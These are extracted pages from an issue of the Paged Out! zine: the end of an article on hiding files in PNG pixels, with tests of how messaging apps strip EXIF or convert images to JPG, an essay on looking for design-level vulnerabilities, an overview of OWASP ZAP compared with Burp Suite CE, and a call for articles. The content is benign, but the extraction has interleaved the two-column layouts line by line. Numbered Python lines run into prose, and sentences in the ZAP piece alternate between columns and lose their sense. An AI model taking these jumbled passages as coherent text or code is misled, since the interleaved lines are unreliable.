Space 28. open(name, 'wb').write(bytes(image[:length]))
29. if __name__ == '__main__':
Using PNG as a file storage sometimes saves space. When I 30. model_path: str = 'some_random_file.txt'
used this algorithm to share a file that was 1.7MB, I used 272KB. 31. image_path: str = 'output.png'
It's almost 6 times less space! 32. save_image(model_path)
33. save_file(image_path)

Sharing
Will sharing somehow destroy our file? I tested 5 different 4. Discord
ways to share and checked it.
Same as protonmail, when we’re sending images via
1. Messenger Discord we get the exact image with all metadata.

First issue with Messenger is that Meta has a policy of getting 5. SMS
rid of EXIF data, so our length inside metadata is gone. But
when we share the message length of a fi le - we can set it With SMS, we have 2 issues but one is major. Firstly,
manually and it works! We shared the file via image! EXIF has been cut off. Secondly, the image has been
converted to JPG, so it’s impossible to decode our file
2. Signal even if we enter the length manually.

Signal has the same policy - they cut off all EXIF data. But this 6. Instagram
time when we tried to set length by ourselves, we got a False
return. When we read pixels from an image, we can see that Instagram has the same issue as SMS - they convert
they’re displayed in (R, G, B, A) so Signal converts our picture to images to JPG, so we can’t read bytes from pixels.
RGBA.

3. Protonmail
Note: I haven’t tested it on large files.
With sharing files as attachment or embedded image,
both cases were True.

Jan "F4s0lix" Wawrzyniak


https://github.com/F4s0lix/file-to-image
64 SAA-ALL 0.0.7
Vulnerability Hunting The Right Way Security/Hacking

Vulnerability Hunting The Right Way


By ~ @Totally_Not_A_Haxxer

I am sure many people reading this are already familiar with the security and
vulnerability research world. It is often that many of the vulnerabilities found are
quite simple. For example, you attack an IoT device to find the most simplistic or
maybe even a simple, but new form of XSS within that device. Going through this
myself, I have spent a lot of time raging over the simple stuff I was finding, as
given my experience in development and my love for it, it's quite sad to see the
commonality of simple flaws. So I tried to look for a new angle and see if there
was anything that not only was a bit more difficult to go through, but also taught
me something new, and felt nice to handle.

Searching By The Root - Design Flaws

The “new angle” involves taking the root of a system, and searching there. What
do I mean by this? Well, this is a way of saying that many flaws in existing
software come from unmaintained software designs. For example, let's say we
are ripping open a new IoT device, this device uses a custom network protocol
that nobody has seen in the wild yet. The first idea, for any security researcher,
would be if not found or discovered yet, to find it yourself, which means to
reverse engineer the protocol yourself. When you go down that path, you should
be looking for the systems that the network protocol is built on, such as the
network layer the protocol is on, if the protocol is part of an existing standard, or
what the protocol is doing. All questions alike can be used to break down the
design of the protocol more, and thus, bring you to the root of where every flaw
may sit.

Going to the bare bones of a system is not only just necessary but helpful
because of the ability to get a full image of a system, and all systems that rely on
that design. For example, instead of finding XSS in a regular web application, you
may want to find XSS pertaining to a specific technological design in which that
technology and others use would be much more valuable. Think CWE versus
CVE. I came up with this angle in my workflow by being able to assess the
current state of the world and technologies alongside vulnerabilities. Well, the
honest and hard truth about this viewpoint is that when looking at it from a design
perspective, people built so many technologies, computers, protocols, standards,
new forms of GSM, etc all on old standards that were never designed with
security in mind. This is an extreme problem we are facing now, and I much see
that the impact that will hit a system harder resides in the root of every system,
rather than at the surface-level design. While not being the only method used for
finding bugs, it does not hurt to add it to your routines.

Totally_Not_A_Haxxer Instagram: https://www.instagram.com/totally_not_a_haxxer


Blog: https://www.medium.com/@Totally_Not_A_Haxxer
CC BY 4.0 GitHub: https://www.github.com/TotallyNotAHaxxer 65
Security/Hacking Zed Attack – test your web app

Zed Attack – test your web app allowing users to discover and fix vulnerabilities quickly
and efficiently, thanks in part to its open-source
Zed Attack Proxy (zaproxy.org) is an open-source philosophy. Open-source software has the advantage of
cybersecurity tool designed for developers and security being free, with no license fees that increase the cost of
experts to identify and fix vulnerabilities in web testing. Another advantage is the ability to customize and
applications. This tool is maintained by the Open Web improve the software due to the availability of the source
Application Security Project (OWASP), an organization code. ZAP also has a free plugin marketplace, which
committed to improving web application security by allows users to expand its functionality.
sharing knowledge and resources. Similar tools and comparison
Needless to say, conducting regular and thorough testing Other similar open-source tools include Nuclei
for web applications is critical to ensuring the quality and (vulnerability scanner), Sn1perSecurity (attack surface
security of the application and providing users with an management platform), Nikto (web server vulnerability
optimal experience. Such testing commonly includes scanner), and Arachni (web application security scanner
functional testing, penetration testing, and fuzz testing framework), all available on GitHub.
(fuzzing). Functional testing involves verifying that all
Another popular free tool is the Community Edition of Burp
application features are implemented correctly and meet
Suite, which also offers a paid Enterprise Edition.
user expectations. Penetration testing is a fundamental
Compared to the other tools mentioned, both OWASP ZAP
security test that aims to identify vulnerabilities and
and Burp Suite are considered eavesdropping proxies that
security risks in the application. Fuzz testing is an
interpose themselves between the browser and the web
automated technique that involves generating random or
server to intercept and manipulate request exchanges. A
semi-random inputs to a program to identify vulnerabilities
brief comparison of ZAP and Burp Suite CE is provided at
or bugs.
the bottom of the page.
This last method is particularly useful in the context of
While I've previously mentioned the positives of
computer security, as it can identify potential flaws in
open-source projects, it must be noted that in all
software that attackers could exploit. Fuzzing can be
open-source projects, both development (such as fixes
performed in various ways, such as mutation-based
and new features) and support heavily depend on the
fuzzing, where input data is randomly altered, or
volunteers behind them. Paid tools like Burp Suite have
generation-based fuzzing, where valid but unexpected
the advantage of a dedicated company continually
input is created. This technique is widely used by
working to improve the software, unlike many open-source
computer security experts to test software robustness
projects where volunteers may only contribute a small
and identify vulnerabilities that could be exploited by
portion of their time each week.
malicious attackers. Fuzzing can enhance computer
system security and protect sensitive data from However, ZAP is a key tool for technical cybersecurity
cyberattacks. analysts involved in managing web applications with
open-source solutions. With its powerful suite of features
As one might expect, ZAP offers special support for
and ease of use, ZAP helps users secure their web
fuzzing web applications. Additionally, ZAP provides
applications and protect them from external threats.
several features for testing and analyzing web application
Furthermore, ZAP, with its free and open-source
security, including detecting vulnerabilities such as SQL
philosophy, supports many open standards and known
injection, cross-site scripting (XSS), clickjacking, and
protocols, making it easy to develop and use add-ons or
SSL/TLS issues. That its scanning feature supports
plugins. Additionally, the ZAP community is available for
various modes, from "Attack" to "Safe," allowing both
support through the ZAP user group on Google Groups [1]
aggressive and cautious approaches to targets is also
and the IRC channel [2].
worth adding.
Because of its intuitive user interface and flexibility, ZAP
has become a popular tool among developers and security [1] https://groups.google.com/g/zaproxy-users
experts. It supports both automated and manual testing, [2] https://web.libera.chat/#zaproxy

Feature Burp Suite CE OWASP ZAP

Cost Free Free


Interception Available Available
Spider Available Available
Update Available Available
Extensions Fewer Options Available No provision for enhanced functionality
False Positive Less More
Comparison Feature Available Available
Documentation Extensive Documentation Little documentation

Fabio Carletti aka Ryuw


https://www.linkedin.com/in/fabio-carletti-ryuw/
66 SAA-TIP 0.0.7
WE WANT YOUR ARTICLE!

Would you like to see your article published in the next issue of Paged
Out!?
Here’s how to make that happen:

First, you need an idea that will fit on one page.


That is one of our key requirements, if not the most important. Every article can only occupy one
page. To be more precise, it needs to occupy the space of 515 x 717 pts.

We have a nifty tool that you can use to check if your page size is ok - https://review-
tools.pagedout.institute/

The article has to be on a topic that is fit for Paged Out! Not sure if your topic is?

You can always ask us before you commit to writing. Or you can consult the list here: https://
pagedout.institute/?page=writing.php#article-topics

Once the topic is locked down, then comes the writing, and it has to be done by you. Remember,
you can write about AI but don’t rely on it to do the writing for you ;) Besides, you will do a better
job than it can!

Next, submit the article to us, preferably as a PDF file (you can also use PNGs for art), at
[email protected].

Here is what happens next:

First, you will receive a link to a form from us. The form asks some really important questions,
including which license you would prefer for your submission, details about the title and the name
under which the article should be published, which fonts you have used and the source of images
that are in it.

Remember that both the fonts and the images need to have licenses that allow them to be used
in commercial projects and to be embedded in a PDF.

Once the replies are received, we will work with you on polishing the article. The stages include a
technical review and a language review.
If there are images in your article, we will ask you for an alt text for them.

After the stages are completed, your article will be ready for publishing!

Not all articles have to be written. If you want to draw a cheatsheet, a diagram, or an image,
please do so, we accept such submissions as well.

This is a shorter and more concise version of the content that can be found here:
https://pagedout.institute/?page=writing.php and here:
https://pagedout.institute/?page=cfp.php

The most important thing though is that you enjoy the process of writing and then of getting your
article ready for publication in cooperation with our great team.

Happy writing!

You might also like